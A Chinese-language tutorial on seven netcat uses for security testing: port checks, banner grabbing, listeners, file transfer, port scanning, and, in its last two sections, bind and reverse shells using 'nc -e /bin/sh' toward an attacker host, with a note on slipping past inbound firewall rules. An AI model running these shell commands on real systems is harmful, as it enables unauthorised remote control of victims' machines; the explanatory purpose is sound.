NetCAT 的七種滲透式安全測試用法
NetCAT 是網路安全測試必備的瑞士小刀,一個小小的工具程式可以完成許多網路相關的安全測試,
當然也是許多駭客必備工具,這篇文章主要說明七種安全測試使用情境。
1. 連線測試
這種測試就像是使用 telnet,確定該遠端電腦的 IP 與 port 服務是否可以連線正常
# nc 10.0.2.100 22 |
2. 取得遠端服務回應訊息
例如遠端電腦是 HTTP Server ,可以透過 HTTP HEAD 的方式,將遠端網站伺服器的回應 header 取得。
# echo -e “HEAD / HTTP/1.0\n\n” | nc 10.0.2.100 80 |
網站伺服器可能會回復如下,因此我們可以得知該網站伺服器為 Apache 2.1.15
HTTP/1.1 403 Forbidden Date: Thu, 09 Nov 2015 4:10:00 GMT Server: Apache/2.1.15 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Expires: Thu, 10 Nov 2015 4:10:00 GMT |
3. 將本機電腦通訊服務埠啟動
例如下列指令會將本機10.0.1.1 port 1234 啟動,listening遠端任何電腦的連線
# nc -l -p 1234 |
因此,我們可以在另外一台遠端電腦輸入下列指令
# telnet 10.0.1.1 1234 |
就可以讓兩台電腦互相連線對話
4.1 檔案電腦 B 傳送到電腦 A (listener 10.0.1.1)
電腦 A (10.0.1.1) 輸入下列指令,以便讓電腦A可以接收電腦 B之後所傳送的檔案。
並且儲存輸出檔名為 fileToPass.out
# nc -l -p 1234 > fileToPass.out |
電腦 B 要傳送檔案到電腦A,執行下列指令
# nc -w3 10.0.1.1 1234 < fileToPass |
4.2 檔案電腦 A(listener 10.0.1.1)傳送到電腦 B
電腦A (listner , 10.0.1.1 1234)
# nc -l -p 1234 < fileToPass |
電腦B
# nc -w3 10.0.1.1 1234 > fileToPass.out |
5. Port Scanning
# nc -n -v -z -w 1 10.0.1.1 1-3000 |
掃描電腦 10.0.1.1 port 範圍1-3000
- -w 1: 每次連線等待時間不要超過 1秒
- -v: verbose
- -z: 不要傳送任何資料
- -n: 不要DNS解析
port Scanning 可以讓我們知道該遠端電腦有開啟那些常見的服務。
另外建議可以使用 nmap來對網路進行偵測
6. Backdoor Shell 後門程式
NetCat可以執行成為後門程式,下列指令執行之後,就可以允許讓遠端電腦連線至 port 1234 執行 Shell指令
受害者電腦 10.0.0.1 port 8080<<<<<<<=============== 遠端駭客伺服器
受害者電腦執行,listen 8080:
# nc -e /bin/sh -l -p 8080 |
遠端駭客電腦執行,連線至受害者電腦 10.0.0.1 8080:
# telnet 10.0.0.1 8080# ls; |
通常駭客利用這種方式,將某台電腦主機開啟某特定的通訊埠 (如8080),
讓駭客可以在遠端連線至該電腦進行操作。
7. Reverse shell (殭屍電腦)
這種情境與上述有些不同。這個情境下,該電腦會主動連線回駭客伺服器,讓駭客可以在遠端伺服器操作。
受害者電腦 ===============>>>>>>>>>>> 遠端駭客伺服器10.0.0.2 port 8080
遠端駭客電腦(10.0.0.2) 執行, listen 8080:
# nc -n -v -l -p 8080 |
受害電腦(10.0.0.1) 執行,連線至遠端駭客電腦 10.0.0.2 8080:
# nc -e /bin/sh 10.0.0.2 8080 |
這個情境下﹑遠端駭客電腦 10.0.0.2 port 8080等待受害者電腦的連線
通常來說,企業內部防火牆會阻擋異常的外部對內部的連線 (InBound),
但是內部到外部伺服器8080 (OutBound)的連線就很容易通過,
因此這種情境駭客用在對於企業內部電腦連線至遠端駭客伺服器,成為駭客的殭屍電腦的一種手法之一。
NetCAT 七種駭客使用 NetCAT的測試情境。
- 連線 port connection 測試
- Server Banner 取得
- Listening Server
- 檔案傳輸
- Port Scanning
- Backdoor Shell 後門程式
- Reverse Backdoor Shell殭屍電腦
參考資料何處下載
http://netcat.sourceforge.net/download.php
https://eternallybored.org/misc/netcat/